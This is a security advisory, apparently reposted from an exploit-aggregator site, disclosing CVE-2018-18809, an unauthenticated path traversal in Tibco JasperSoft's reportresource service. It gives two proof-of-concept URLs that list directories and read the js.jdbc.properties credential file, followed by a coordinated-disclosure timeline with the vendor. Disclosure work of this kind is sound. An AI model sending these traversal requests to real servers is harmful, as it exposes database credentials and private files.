Tibco JasperSoft Path Traversal Vulnerability

🗓️ 10 Sep 2019 00:00:00Reported by Elar LangType

zdt🔗 0day.today👁 69 Views

Path traversal in Tibco JasperSoft CVE-2018-18809, allowing remote access to file

Reporter	Title	Published	Views	Family All 20
IBM Security Bulletins	Security Bulletin: TIBCO JasperReports Vulnerabilities Affect IBM Sterling B2B Integrator (CVE-2020-9410, CVE-2018-18809)	6 Oct 202114:49	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple JasperReports Vulnerabilities Affect IBM Control Center (CVE-2020-9410, CVE-2018-18809)	16 Jun 202119:25	–	ibm
ATTACKERKB	TIBCO JasperReports Library Directory Traversal Vulnerability	7 Mar 201900:00	–	attackerkb
BDU FSTEC	The vulnerability of the server-side application library for creating reports from TIBCO JasperReports Library, JasperReports Library for ActiveMatrix BPM, JasperReports Server, JasperReports Server for AWS Marketplace, and JasperReports Server for ActiveMatrix BPM arises from an incorrect limitation on the path to the restricted directory. This allows attackers to disclose sensitive information that should be protected.	1 Mar 202300:00	–	bdu_fstec
Circl	CVE-2018-18809	8 Mar 201900:21	–	circl
CISA KEV Catalog	TIBCO JasperReports Library Directory Traversal Vulnerability	29 Dec 202200:00	–	cisa_kev
CNVD	Multiple TIBCO Software Products Path Traversal Vulnerabilities	10 Sep 201900:00	–	cnvd
CVE	CVE-2018-18809	7 Mar 201922:00	–	cve
Cvelist	CVE-2018-18809 TIBCO JasperReports Library Directory Traversal Vulnerability	7 Mar 201922:00	–	cvelist
Dsquare	TIBCO JasperSoft Path Traversal	28 Oct 202000:00	–	dsquare

Title: CVE-2018-18809 Path traversal in Tibco JasperSoft
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: Tibco JasperSoft (https://www.jaspersoft.com/)
Vulnerability: Path traversal
CVE: CVE-2018-18809

# Path traversal
Vulnerability is in reportresource/reportresource/ service and in resource
parameter. There is "defence" - value for resource param must start with
net/sf/jasperreports/.

Available for remote not authenticated users.

## Proof-of-Concept
Reading file listing:
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../

Reading file content (js.jdbc.properties as an example):
https://domain/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties

# List of Systems Affected, Related fixes and releases:
"TIBCO Security Advisory: March 6, 2019 - TIBCO JasperReports Library -
2018-18809"
https://www.tibco.com/support/advisories/2019/03/tibco-security-advisory-march-6-2019-tibco-jasperreports-library-2018-18809


# Vulnerability Disclosure Timeline

2018-10-15 | me > Tibco | Notification to [email protected]
2018-10-15 | Tibco > me | Thanks for PoC

2018-10-29 | me > Tibco | How is going? No fixes even for their own site.
2018-10-15 | Tibco > me | Explanation of policy that they threat everyone
equally and as no fix available for their customer, they can not fix their
own site also.

2019-01-11 | Tibco > me | Issue is still under investigation. Issue
discovery credits and publishing details coordination for future.
2019-01-11 | me > Tibco | Response, agreement with credits.

2019-03-06 | Tibco > me | "We published security advisories"
2019-03-06 | Tibco | "TIBCO Security Advisory: March 6, 2019 - TIBCO
JasperReports Library - 2018-18809"

2019-04-21 | me > Tibco | I'm going to write Full Disclosure, but your own
demo site is still vulnerable.
..
2019-04-26 | Tibco > me | Demo site fixed/updated now.

2019-09-07 | me | Full Disclosure on https://security.elarlang.eu

# More detailed description is available in blog:
https://security.elarlang.eu/cve-2018-18809-path-traversal-in-tibco-jaspersoft.html

--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com

#  0day.today [2019-12-04]  #

10 Sep 2019 00:00Current

0.3Low risk

Vulners AI Score0.3

EPSS0.93909